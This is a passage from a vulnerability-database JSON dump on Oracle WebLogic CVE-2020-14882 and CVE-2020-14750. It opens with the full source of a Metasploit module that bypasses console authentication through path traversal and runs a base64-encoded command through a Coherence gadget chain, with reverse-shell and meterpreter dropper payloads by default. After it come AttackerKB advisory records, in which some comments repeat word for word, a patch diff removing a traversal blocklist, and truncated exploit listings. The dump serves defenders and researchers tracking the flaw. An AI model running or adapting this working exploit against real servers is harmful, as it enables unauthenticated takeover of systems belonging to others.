Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Powershell\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Oracle WebLogic Server Administration Console Handle RCE',\n 'Description' => %q{\n This module exploits a path traversal and a Java class instantiation\n in the handle implementation of WebLogic's Administration Console to\n execute code as the WebLogic user.\n\n Versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, and\n 14.1.1.0.0 are known to be affected.\n\n Tested against 12.2.1.3.0 from Vulhub (Linux) and on Windows.\n\n Warning! Multiple sessions may be created by exploiting this vuln.\n },\n 'Author' => [\n 'voidfyoo', # Discovery\n 'Jang', # Analysis and PoC\n 'wvu' # Module\n ],\n 'References' => [\n ['CVE', '2020-14882'], # Auth bypass?\n ['CVE', '2020-14883'], # RCE?\n ['CVE', '2020-14750'], # Patch bypass\n ['EDB', '48971'], # An exploit\n ['URL', 'https://www.oracle.com/security-alerts/cpuoct2020.html'],\n ['URL', 'https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf']\n ],\n 'DisclosureDate' => '2020-10-20', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux', 'win'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_python_ssl'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'CMDSTAGER::FLAVOR' => :curl,\n 'PAYLOAD' => 'linux/x64/meterpreter_reverse_https'\n }\n }\n ],\n [\n 'Windows Command',\n {\n 'Platform' => 'win',\n 'Arch' => ARCH_CMD,\n 'Type' => :win_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'\n }\n }\n ],\n [\n 'Windows Dropper',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :win_dropper,\n 'DefaultOptions' => {\n 'CMDSTAGER::FLAVOR' => :psh_invokewebrequest,\n 'PAYLOAD' => 'windows/x64/meterpreter_reverse_https'\n }\n }\n ],\n [\n 'PowerShell Stager',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :psh_stager,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_https'\n }\n }\n ]\n ],\n 'DefaultTarget' => 4,\n 'DefaultOptions' => {\n 'WfsDelay' => 10\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n Opt::RPORT(7001),\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n res = send_request_handle(rand_text_alphanumeric(8..42))\n\n unless res\n return CheckCode::Unknown('Target did not respond to check.')\n end\n\n if res.code == 200 && res.body.include?('Deploying Application')\n raise RuntimeError\n end\n\n # HTTP/1.1 302 Moved Temporarily\n # [snip]\n # Location: http://127.0.0.1:7001/console/console.portal?_nfpb=true&_pageLabel=UnexpectedExceptionPage\n # [snip]\n unless res.code == 302 &&\n res.redirection.path == '/console/console.portal' &&\n res.redirection.query.include?('_pageLabel=UnexpectedExceptionPage')\n return CheckCode::Safe('Path traversal failed.')\n end\n\n CheckCode::Vulnerable('Path traversal successful.')\n rescue RuntimeError\n vprint_error('Application is deploying, sleeping and retrying check')\n\n sleep(1)\n retry\n end\n\n def exploit\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n case target['Type']\n when :unix_cmd, :win_cmd\n execute_command(payload.encoded)\n when :linux_dropper, :win_dropper\n execute_cmdstager\n when :psh_stager\n execute_command(cmd_psh_payload(\n payload.encoded,\n payload.arch.first,\n remove_comspec: true\n ))\n end\n end\n\n def execute_command(cmd, _opts = {})\n vprint_status(\"Executing command: #{cmd}\")\n\n send_request_handle(coherence_gadget_chain(cmd))\n end\n\n def send_request_handle(handle)\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => aperture_science_handheld_portal_device,\n 'vars_post' => {\n 'handle' => handle\n }\n )\n end\n\n def coherence_gadget_chain(cmd)\n <<~JAVA.gsub(/^\\s+/, '').tr(\"\\n\", '')\n com.tangosol.coherence.mvel2.sh.ShellSession('\n java.lang.Runtime.getRuntime().exec(\n new java.lang.String[] {\n #{win_target? ? '\"cmd.exe\", \"/c\", ' : '\"/bin/sh\", \"-c\", '}\n new java.lang.String(\n java.util.Base64.getDecoder().decode(\"#{Rex::Text.encode_base64(cmd)}\")\n )\n }\n )\n ')\n JAVA\n end\n\n def aperture_science_handheld_portal_device\n normalize_uri(target_uri.path, '/console/css/.%252e/console.portal')\n end\n\n def win_target?\n target.platform.names.first == 'Windows'\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/weblogic_admin_handle_rce.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "attackerkb": [{"lastseen": "2023-09-28T08:54:12", "description": "The XML-RPC server in supervisor before 3.0.1, 3.1.x before 3.1.4, 3.2.x before 3.2.4, and 3.3.x before 3.3.3 allows remote authenticated users to execute arbitrary commands via a crafted XML-RPC request, related to nested supervisord namespace lookups.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-08-23T00:00:00", "type": "attackerkb", "title": "CVE-2017-11610", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11610"], "modified": "2020-07-30T00:00:00", "id": "AKB:4AD409C9-5AD4-4111-9454-32638C9F8255", "href": "https://attackerkb.com/topics/rRCj4KklOQ/cve-2017-11610", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-07-21T01:57:50", "description": "Vulnerability in the Oracle Coherence product of Oracle Fusion Middleware (component: Caching,CacheStore,Invocation). Supported versions that are affected are 3.7.1.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle Coherence. Successful attacks of this vulnerability can result in takeover of Oracle Coherence. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).\n\n \n**Recent assessments:** \n \n**ccondon-r7** at January 29, 2021 5:47pm UTC reported:\n\nSince this got a little more attention later in 2020, it\u2019s probably good to note here that there are a number of different implementations of Oracle Coherence, and the likeliest attack vector that we\u2019ve seen is WebLogic Server. WebLogic had a number of vulnerabilities that were exploited in the wild (some widely, e.g., [CVE-2020-14882](<https://attackerkb.com/topics/sb4F8UT5zu/cve-2020-14882-unauthenticated-rce-in-console-component-of-oracle-weblogic-server?referrer=2555#rapid7-analysis>) and [CVE-2020-14750](<https://attackerkb.com/topics/mzyS1rMcZc/cve-2020-14750-oracle-weblogic-remote-unauthenticated-remote-code-execution-rce-vulnerability?referrer=2555>)) in 2020. Definitely a good idea to keep tight WebLogic patch cycles whenever possible.\n\n**space-r7** at May 15, 2020 7:02pm UTC reported:\n\nSince this got a little more attention later in 2020, it\u2019s probably good to note here that there are a number of different implementations of Oracle Coherence, and the likeliest attack vector that we\u2019ve seen is WebLogic Server. WebLogic had a number of vulnerabilities that were exploited in the wild (some widely, e.g., [CVE-2020-14882](<https://attackerkb.com/topics/sb4F8UT5zu/cve-2020-14882-unauthenticated-rce-in-console-component-of-oracle-weblogic-server?referrer=2555#rapid7-analysis>) and [CVE-2020-14750](<https://attackerkb.com/topics/mzyS1rMcZc/cve-2020-14750-oracle-weblogic-remote-unauthenticated-remote-code-execution-rce-vulnerability?referrer=2555>)) in 2020. Definitely a good idea to keep tight WebLogic patch cycles whenever possible.\n\n**gwillcox-r7** at October 20, 2020 6:53pm UTC reported:\n\nSince this got a little more attention later in 2020, it\u2019s probably good to note here that there are a number of different implementations of Oracle Coherence, and the likeliest attack vector that we\u2019ve seen is WebLogic Server. WebLogic had a number of vulnerabilities that were exploited in the wild (some widely, e.g., [CVE-2020-14882](<https://attackerkb.com/topics/sb4F8UT5zu/cve-2020-14882-unauthenticated-rce-in-console-component-of-oracle-weblogic-server?referrer=2555#rapid7-analysis>) and [CVE-2020-14750](<https://attackerkb.com/topics/mzyS1rMcZc/cve-2020-14750-oracle-weblogic-remote-unauthenticated-remote-code-execution-rce-vulnerability?referrer=2555>)) in 2020. Definitely a good idea to keep tight WebLogic patch cycles whenever possible.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 3\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-15T00:00:00", "type": "attackerkb", "title": "CVE-2020-2555", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14750", "CVE-2020-14882", "CVE-2020-2555"], "modified": "2021-01-20T00:00:00", "id": "AKB:A4BDBFB9-4493-4EF5-8C05-276721F6549F", "href": "https://attackerkb.com/topics/gB0KtHnrZE/cve-2020-2555", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-31T20:37:26", "description": "Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).\n\n \n**Recent assessments:** \n \n**wvu-r7** at November 02, 2020 10:26pm UTC reported:\n\nCVE-2020-14750 appears to be the patch bypass for [CVE-2020-14882](<https://attackerkb.com/topics/sb4F8UT5zu/cve-2020-14882-unauthenticated-rce-in-console-component-of-oracle-weblogic-server>). Please see CVE-2020-14882\u2019s [Rapid7 analysis](<https://attackerkb.com/topics/sb4F8UT5zu/cve-2020-14882-unauthenticated-rce-in-console-component-of-oracle-weblogic-server#rapid7-analysis>) for more information. The CVE-2020-14750 patch is reproduced below.\n \n \n --- patched1/com/bea/console/utils/MBeanUtilsInitSingleFileServlet.java\t2020-11-02 13:13:28.000000000 -0600\n +++ patched2/com/bea/console/utils/MBeanUtilsInitSingleFileServlet.java\t2020-11-02 12:11:01.000000000 -0600\n @@ -2,6 +2,7 @@\n \n import com.bea.netuix.servlets.manager.SingleFileServlet;\n import java.io.IOException;\n +import java.util.List;\n import javax.servlet.ServletConfig;\n import javax.servlet.ServletException;\n import javax.servlet.ServletRequest;\n @@ -20,8 +21,6 @@\n \n private static final long serialVersionUID = 1L;\n \n - private static final String[] IllegalUrl = new String[] { \";\", \"%252E%252E\", \"%2E%2E\", \"..\", \"%3C\", \"%3E\", \"<\", \">\" };\n - \n public static void initMBean() {\n MBeanUtilsInitializer.initMBeanAsynchronously();\n }\n @@ -39,8 +38,9 @@\n if (req instanceof HttpServletRequest) {\n HttpServletRequest httpServletRequest = (HttpServletRequest)req;\n String url = httpServletRequest.getRequestURI();\n - for (int i = 0; i < IllegalUrl.length; i++) {\n - if (url.contains(IllegalUrl[i])) {\n + if (!ConsoleUtils.isUserAuthenticated(httpServletRequest))\n + throw new ServletException(\"User not authenticated.\"); \n + if (!isValidUrl(url, httpServletRequest)) {\n if (resp instanceof HttpServletResponse) {\n LOG.error(\"Invalid request URL detected. \");\n HttpServletResponse httpServletResponse = (HttpServletResponse)resp;\n @@ -49,7 +49,6 @@\n return;\n } \n } \n - } \n try {\n super.service(req, resp);\n } catch (IllegalStateException e) {\n @@ -60,4 +59,15 @@\n LOG.debug(e); \n } \n }\n + \n + private boolean isValidUrl(String url, HttpServletRequest req) {\n + String consoleContextPath = ConsoleUtils.getConsoleContextPath();\n + List<String> portalList = ConsoleUtils.getConsolePortalList();\n + for (String portal : portalList) {\n + String tmp = \"/\" + consoleContextPath + portal;\n + if (url.equals(tmp))\n + return true; \n + } \n + return false;\n + }\n }\n \n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-02T00:00:00", "type": "attackerkb", "title": "CVE-2020-14750 \u2014 Oracle WebLogic Remote Unauthenticated Remote Code Execution (RCE) Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14750", "CVE-2020-14882", "CVE-2021-26084"], "modified": "2020-11-19T00:00:00", "id": "AKB:E7B3F106-3C35-4783-8A6A-BB887C64A40D", "href": "https://attackerkb.com/topics/mzyS1rMcZc/cve-2020-14750-oracle-weblogic-remote-unauthenticated-remote-code-execution-rce-vulnerability", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-07-09T17:26:10", "description": "Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).\n\n \n**Recent assessments:** \n \n**elligottmc** at October 29, 2020 2:27pm UTC reported:\n\nAdjusting the attacker value and exploitability scores to reflect the data and assessment already provided by **@lvarela-r7** in this topic.\n\n<https://isc.sans.edu/forums/diary/PATCH+NOW+CVE202014882+Weblogic+Actively+Exploited+Against+Honeypots/26734/> \n<https://twitter.com/jas502n/status/1321416053050667009>\n\n**ccondon-r7** at November 01, 2020 4:19pm UTC reported:\n\nAdjusting the attacker value and exploitability scores to reflect the data and assessment already provided by **@lvarela-r7** in this topic.\n\n<https://isc.sans.edu/forums/diary/PATCH+NOW+CVE202014882+Weblogic+Actively+Exploited+Against+Honeypots/26734/> \n<https://twitter.com/jas502n/status/1321416053050667009>\n\n**lvarela-r7** at October 29, 2020 12:41pm UTC reported:\n\nAdjusting the attacker value and exploitability scores to reflect the data and assessment already provided by **@lvarela-r7** in this topic.\n\n<https://isc.sans.edu/forums/diary/PATCH+NOW+CVE202014882+Weblogic+Actively+Exploited+Against+Honeypots/26734/> \n<https://twitter.com/jas502n/status/1321416053050667009>\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-21T00:00:00", "type": "attackerkb", "title": "CVE-2020-14882 \u2014 Unauthenticated RCE in Console component of Oracle WebLogic Server", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14750", "CVE-2020-14882", "CVE-2020-2555", "CVE-2021-26084"], "modified": "2020-12-28T00:00:00", "id": "AKB:2941EA77-EC87-4EFE-8B5C-AD997AEB5502", "href": "https://attackerkb.com/topics/sb4F8UT5zu/cve-2020-14882-unauthenticated-rce-in-console-component-of-oracle-weblogic-server", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-07-13T18:12:19", "description": "# (CVE-2020\u201314882) Weblogic Unauthorized bypass RCE\n(CVE-2020-14...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-01T13:12:27", "type": "githubexploit", "title": "Exploit for CVE-2020-14882", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2022-02-12T00:29:42", "id": "65160BD3-C57E-53F7-BB62-1409E74EB491", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:12:04", "description": "# CVE-2020-14882\n\n## \u53d7\u5f71\u54cd\u7684\u7248\u672c\uff1a 10.3.6.0.0\u300112.1.3.0.0\u300112.2.1.3.0\u300112...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-29T15:44:23", "type": "githubexploit", "title": "Exploit for CVE-2020-14882", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2022-07-02T01:19:54", "id": "DAF7B187-3A0C-543D-BE33-E65468E5890A", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:35:22", "description": "<h1 style=\"font-size:10vw\" align=\"center\"><b>CVE-2020-14882 WebL...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-10T21:32:36", "type": "githubexploit", "title": "Exploit for CVE-2020-14882", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2021-09-16T07:25:25", "id": "E8075733-690E-5B6E-984C-80D074BC5EFF", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-15T11:54:14", "description": "# CVE-2020-14882\nCVE-2020-14882\n\n## Description \nVulnerability ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-25T12:57:08", "type": "githubexploit", "title": "Exploit for CVE-2020-14882", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2022-07-15T09:44:00", "id": "859F1E96-558A-5D4B-8759-8AA74395E276", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:12:32", "description": "# CVE-2020-1...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-29T06:30:30", "type": "githubexploit", "title": "Exploit for CVE-2020-14882", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2022-03-18T23:00:39", "id": "45775466-2D18-5308-ACCE-40CA731C65D0", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-08T02:04:26", "description": "# CVE-2020-14882_ALL\r\n\r\nCVE-2020-14882_ALL\u7efc\u5408\u5229\u7528\u5de5\u5177\uff0c\u652f\u6301\u547d\u4ee4\u56de\u663e\u68c0\u6d4b\u3001\u6279\u91cf\u547d\u4ee4\u56de\u663e...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-03T10:49:35", "type": "githubexploit", "title": "Exploit for CVE-2020-14882", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2022-08-07T12:56:08", "id": "9AEDE16C-FF28-5178-A8D1-CB6649E9ED56", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:13:29", "description": "# CVE-2020-14882-GUI\n\n\u521a\u63a5\u89e6\u4e86qt\u6846\u67b6\uff0c...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-11T06:52:32", "type": "githubexploit", "title": "Exploit for 